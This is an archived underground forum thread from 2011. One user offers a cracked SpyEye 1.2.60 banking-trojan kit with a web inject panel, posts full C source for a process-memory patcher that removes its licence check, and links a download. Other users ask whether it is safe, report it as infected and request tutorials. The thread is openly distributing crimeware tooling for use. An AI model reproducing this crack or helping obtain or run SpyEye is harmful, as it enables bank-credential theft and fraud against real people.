PDA

View Full Version : SpyEye 1.2.60 cracked + web inject panel



r00t3x
01-31-2011, 07:26 AM
http://4.bp.blogspot.com/_B__eoAM-jDQ/TNmsN2X47iI/AAAAAAAAAQM/VH1-53MplwA/s1600/spypwned.PNG

the crack is included and compiled, and here is the source code :

#include <Windows.h>
#include <tlhelp32.h>

typedef LONG ( NTAPI *_NtSuspendProcess )( IN HANDLE ProcessHandle );
typedef LONG ( NTAPI *_NtResumeProcess )( IN HANDLE ProcessHandle );

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {

TOKEN_PRIVILEGES priv;
HANDLE hThis, hToken;
LUID luid;
hThis = GetCurrentProcess();
OpenProcessToken(hThis, TOKEN_ADJUST_PRIVILEGES, &hToken);
LookupPrivilegeValue(0, "seDebugPrivilege", &luid);
priv.PrivilegeCount = 1;
priv.Privileges[0].Luid = luid;
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, false, &priv, 0, 0, 0);
CloseHandle(hToken);
CloseHandle(hThis);

HANDLE ProcessHandle = 0;
_NtSuspendProcess NtSuspendProcess = 0;
_NtResumeProcess NtResumeProcess = 0;
PROCESSENTRY32 processInfo;
processInfo.dwSize = sizeof(processInfo);
HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
CHAR processName[] = "SpyEye.exe";
DWORD PID = 0 ;


DWORD Patch1 = 0x4010CE;
DWORD Patch2 = 0x4010D3;
DWORD Patch3 = 0x4010D5;
DWORD Patch4 = 0x4010D6;

UCHAR PatchVal1[] = "\xB8\x12\x11\x40\x00";
UCHAR PatchVal2[] = "\xFF\xD0";
UCHAR PatchVal3[] = "\x90";
UCHAR PatchVal4[] = "\x90";


NtSuspendProcess = (_NtSuspendProcess)GetProcAddress( GetModuleHandle( "ntdll" ), "NtSuspendProcess" );
NtResumeProcess = (_NtResumeProcess)GetProcAddress( GetModuleHandle( "ntdll" ), "NtResumeProcess" );


if ( processesSnapshot == INVALID_HANDLE_VALUE ){
return 0;
}
Process32First(processesSnapshot, &processInfo);

while ( Process32Next(processesSnapshot, &processInfo)){
if ( !strcmp(processName,processInfo.szExeFile)){
CloseHandle(processesSnapshot);
PID = processInfo.th32ProcessID;
break;
}
}
if(PID != NULL){
//MessageBoxA(NULL,(LPCSTR)PID,"SpyEye.exe - PID",0);
ProcessHandle = OpenProcess( PROCESS_ALL_ACCESS, FALSE, PID);
}
if ( ProcessHandle != NULL ){
NtSuspendProcess( ProcessHandle );

WriteProcessMemory(ProcessHandle, (LPVOID)Patch1, &PatchVal1, sizeof(PatchVal1)-1, NULL);
WriteProcessMemory(ProcessHandle, (LPVOID)Patch2, &PatchVal2, sizeof(PatchVal2)-1, NULL);
WriteProcessMemory(ProcessHandle, (LPVOID)Patch3, &PatchVal3, sizeof(PatchVal3)-1, NULL);
WriteProcessMemory(ProcessHandle, (LPVOID)Patch4, &PatchVal4, sizeof(PatchVal4)-1, NULL);
/*
004010CE B8 12114000 MOV EAX,SpyEye_1.00401112
004010D3 FFD0 CALL EAX
004010D5 90 NOP
004010D6 90 NOP
*/
MessageBoxA(NULL,"SpyEye should have been patched now.\nJust press OK and enjoy","SpyEye-Patch by Zer0Flag",0);

NtResumeProcess( ProcessHandle );
CloseHandle(ProcessHandle);
}
return 0;
}

Download :
http://www.mediafire.com/?hyfz3cjnutiq1ux

enjoy and say thanks :)

yuiseto
02-01-2011, 05:46 PM
can i use it with safe?

r00t3x
02-01-2011, 10:53 PM
yes yuiseto, it's safe

mixnovich
02-02-2011, 12:01 AM
i hope it works fine for me

untraceablecash
02-02-2011, 10:55 PM
theres a virus report that doesnt look clean....

blackhack
02-04-2011, 11:49 AM
let me ccccccc

Deflate
02-04-2011, 02:14 PM
anyone tested it?

royal
02-11-2011, 12:13 AM
Thank u to post it .
:d

ryan1918
02-21-2011, 05:23 PM
It's infected.

arocrocks
02-25-2011, 09:20 PM
can u kindly post a video tutorial on how to use it?

hyperkam
03-01-2011, 10:32 PM
has some admin verified it ?

whathecoke
03-03-2011, 03:25 AM
Thank's for share !!

tanny
03-03-2011, 08:49 AM
its infected lol hmm

NunoFlora
03-12-2011, 02:47 AM
anyone tested it?

sdzwb
03-12-2011, 03:40 AM
cool man
thanks for sharing

xtrcom
03-19-2011, 12:31 AM
cheers man

PhoeniX
03-20-2011, 10:26 AM
thank you man

antitos
03-21-2011, 05:55 PM
this good bot ?

4don4i
04-21-2012, 09:50 PM
thanks i will test it...

Fild1973
07-12-2012, 04:36 PM
Can anyone update this link ?

thedaydream
08-01-2012, 10:35 AM
These days nobody gona guve free softvares and + injects :D :D :D who you trying to fckup ? :D : D:D this man is funny !

jonk Abadn
10-20-2018, 11:54 PM
hi
where is download spyeye????????????/